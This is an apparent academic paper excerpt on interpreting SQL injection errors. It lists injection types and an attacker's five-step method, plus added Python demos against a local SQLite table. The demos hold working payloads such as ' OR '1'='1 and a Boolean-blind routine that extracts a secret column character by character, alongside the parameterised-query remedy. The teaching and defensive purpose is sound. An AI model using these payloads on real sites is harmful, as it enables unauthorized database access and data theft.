By U. Chandrasekhar and Digvijay Singh
Abstract. 
 

SQL injections pose a serious risk to e-commerce sites and to any database-driven web page. There are several kinds of SQL injection, and for each kind the errors returned by the application are read differently when an attacker works out the underlying query in order to exploit the website. This paper discusses how to interpret the errors for each type of injection. This will help us find exhaustive solutions for every injection strategy. The paper also suggests a few remedies to defend against and prevent such attacks.

Introduction

SQL injections are web attacks in which the attacker alters the structure of the SQL query[3,5] through input carried in the web URL and gains unauthorized access to the back-end database. We depend on the Internet for daily needs such as e-commerce, e-learning, social networking and online billing. Huge amounts of confidential data, including our login details, are held in the databases behind these websites, so building a secure web application is of utmost importance for any developer. Information security deals with the confidentiality, integrity and availability of stored data. The details we enter through the website become part of the SQL query[7] used to read or modify the back-end data. When the GET method[5] is used to pass information from the front end to the back end, these parameters are visible in the URL, where the attacker can edit them freely. By experimenting and studying the errors the web page throws, the attacker learns how the query behaves; with that understanding he modifies the parameters in the URL to gain unauthorized access to the back-end tables. This is known as an SQL injection attack (SQLIA)[6,8,10]. Such attacks are possible because of design flaws in the web application, chiefly building the query by concatenating untrusted input into the statement text. The damage can range from the disclosure of a few rows to complete compromise of the system. With a little care and foresight these attacks can be prevented or defended against. SQL injection occurs at the boundary between the presentation layer and the CGI (server-side script) layer, where request parameters are turned into a query. According to the ANSI SQL standard, the elements of SQL can be divided into the following categories:

– Blank space: space characters, tabs, carriage returns, line feeds, etc.
– Comments: single-line comments, introduced by the comment symbol "--"; multi-line comments, enclosed by the pair of comment symbols "/*" and "*/".
– Keywords: such as "SELECT", "INSERT", "GRANT", etc.
– Punctuation: used to separate SQL statements and in operators, like "=", "(", ";", etc.
– Identifiers: used to name databases, tables, columns, variables, etc.
– Data: all kinds of literals used in SQL queries, such as strings, integers, numbers, dates, etc.
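
The categories above are what a database's lexer sees, and they explain why a stray quote produces an error while a well-formed payload silently changes the statement. The following is an added example, not code from the paper: a small regex-based lexer that labels each token of a statement with one of the listed categories. The keyword subset, the query template and the sample inputs are assumptions made for the demo, and double-quoted literals are treated as data (MySQL-style, matching the "double quotes - string" cases discussed later) rather than as ANSI identifiers.

```python
"""Label the tokens of an SQL statement with the ANSI element categories
listed above: blank, comment, keyword, punctuation, identifier, data.

Added example (not the paper's code). KEYWORDS is a small subset chosen
for the demo; build_query() mimics the vulnerable concatenation a GET
handler would perform and is an assumption, not the paper's application.
"""
import re

# Small subset of reserved words; anything else alphabetic is an identifier.
KEYWORDS = {
    "SELECT", "FROM", "WHERE", "AND", "OR", "NOT", "INSERT", "INTO", "VALUES",
    "UPDATE", "SET", "DELETE", "UNION", "ALL", "GRANT", "DROP", "TABLE",
    "NULL", "LIKE", "ORDER", "BY", "LIMIT",
}

# Patterns are tried in order at the current offset; the first match wins.
# The trailing "error" pattern catches an unterminated quoted literal, which
# is exactly what a lone injected quote produces.
TOKEN_SPEC = [
    ("blank",       r"[ \t\r\n]+"),
    ("comment",     r"--[^\r\n]*"),              # single-line comment
    ("comment",     r"/\*.*?\*/"),               # multi-line comment
    ("data",        r"'(?:[^']|'')*'"),          # string literal, '' escapes '
    ("data",        r'"(?:[^"]|"")*"'),          # double-quoted string (MySQL)
    ("data",        r"\d+(?:\.\d+)?"),           # numeric literal
    ("identifier",  r"[A-Za-z_][A-Za-z0-9_]*"),  # promoted to keyword if reserved
    ("punctuation", r"<=|>=|<>|!=|[=<>(),;*+\-/.]"),
    ("error",       r"['\"].*"),                 # unterminated literal
]
_COMPILED = [(kind, re.compile(pat, re.DOTALL)) for kind, pat in TOKEN_SPEC]


def tokenize(sql):
    """Return (category, text) pairs covering the whole statement."""
    tokens = []
    pos = 0
    while pos < len(sql):
        for kind, rx in _COMPILED:
            m = rx.match(sql, pos)
            if m:
                text = m.group(0)
                if kind == "identifier" and text.upper() in KEYWORDS:
                    kind = "keyword"
                tokens.append((kind, text))
                pos = m.end()
                break
        else:
            raise ValueError(f"unexpected character {sql[pos]!r} at offset {pos}")
    return tokens


def structure(sql):
    """The statement's shape: its category sequence with blanks dropped."""
    return [kind for kind, _ in tokenize(sql) if kind != "blank"]


def build_query(user_id):
    """Assumed vulnerable GET handler: the parameter is pasted into the SQL."""
    return "SELECT name FROM users WHERE id = '" + user_id + "'"


if __name__ == "__main__":
    for param in ["7", "7' OR '1'='1", "7'--", "7'"]:
        sql = build_query(param)
        print(f"{sql!r}\n  -> {structure(sql)}")
```

Run it and compare the four shapes: the benign value yields a single data token at the end, the OR payload appends keyword/data/punctuation/data to the statement, the "--" payload turns the application's own closing quote into part of a comment, and the lone quote leaves an unterminated literal that a real database rejects with the kind of error the paper teaches the reader to interpret.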

VARIOUS KINDS OF SQL INJECTIONS

SQLIAs are carried out in the following five steps.
– Enumerate the application's behaviours.
– Fuzz the application with bogus data with the goal of crashing the application.
– Try to control the injection point by guessing the query used in the back end.
– Extract the data or schema information from the back-end database.
– Manipulate the data or schema to the attacker's needs.
The paper shows how the errors produced by the following SQL injection[7] types are handled when the GET method[6,8] of submission is used:
1. Error based - single quotes
2. Error based - integer based
3. Error based - single quotes with twist - string
4. Error based - double quotes - string
5. Double injection - single quotes - string
6. Dump into outfile - string
7. Double injection - double quotes - string
8. Blind - Boolean based - single quotes
9. Blind - time based - single quotes
10. Blind - time based - double quotes
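
To make the five-step procedure and the first few injection classes concrete, here is an added example (not the paper's code) that reproduces them against an in-memory SQLite table: the error-based single-quote and integer cases, the Boolean-based blind case carried through to full extraction of a column value, and the bound-parameter query that closes the hole. The table, its rows and the `lookup_*` functions are constructed for the demo and stand in for the GET handler the paper analyses; time-based variants are not shown because SQLite has no SLEEP().

```python
"""Vulnerable vs. parameterised lookup against an in-memory SQLite table.

Added example, not the paper's code. The schema, rows and functions are
constructed for the demo; lookup_vulnerable() models a GET handler that
concatenates the request parameter into its SQL.
"""
import sqlite3
import string


def make_db():
    """Constructed sample data: two users, one of whom has a 'secret'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cr3t"), (2, "bob", "hunter2")])
    return conn


def lookup_vulnerable(conn, param, quoted=True):
    """The flaw: the GET parameter is pasted into the statement text.

    quoted=True models the 'single quotes' classes, quoted=False the
    'integer based' class. An error-based page returns the DB error verbatim.
    """
    literal = f"'{param}'" if quoted else param
    sql = f"SELECT name FROM users WHERE id = {literal}"
    try:
        return "ok", [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "error", str(exc)


def lookup_safe(conn, param):
    """Remedy: a bound parameter is always data, never part of the SQL."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (param,))
    return "ok", [row[0] for row in rows]


def blind_extract(conn, row_id, alphabet, max_len=16):
    """Boolean-based blind: recover users.secret for row_id one character at a
    time, using only whether the vulnerable page returned a row or not."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (f"1' AND substr((SELECT secret FROM users WHERE id={row_id}),"
                     f"{pos},1)='{ch}")
            status, rows = lookup_vulnerable(conn, probe)
            if status == "ok" and rows:      # true branch: the row came back
                recovered += ch
                break
        else:
            break                            # no character matched: end of value
    return recovered


def run_demo():
    """Exercise each case once and return the observable results."""
    conn = make_db()
    return {
        "benign": lookup_vulnerable(conn, "1"),
        "quote_error": lookup_vulnerable(conn, "1'")[0],          # step 2: fuzz
        "quote_bypass": lookup_vulnerable(conn, "1' OR '1'='1"),  # step 3: control
        "int_bypass": lookup_vulnerable(conn, "1 OR 1=1", quoted=False),
        "blind": blind_extract(conn, 2, string.ascii_lowercase + string.digits),
        "safe_bypass_attempt": lookup_safe(conn, "1' OR '1'='1"),
        "safe_benign": lookup_safe(conn, "1"),
    }


if __name__ == "__main__":
    for case, result in run_demo().items():
        print(f"{case}: {result}")
```

The lone quote is the fuzzing step: the database error it triggers tells the attacker the parameter lands inside a quoted string literal. Once the injection point is controlled, `' OR '1'='1` returns every row, and the blind probe turns a yes/no page difference into the full value of `secret` for user 2. The parameterised version returns nothing for the same payload because the whole string is compared as a single value and never parsed as SQL.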

For the entire white paper, see understanding_query_vulnerabilities_during_sql_injection_1.pdf (PDF, 213 kb).

Copyright © Digvijay Singh, VIT Vellore. Any unauthorized reprint or use of this material is prohibited.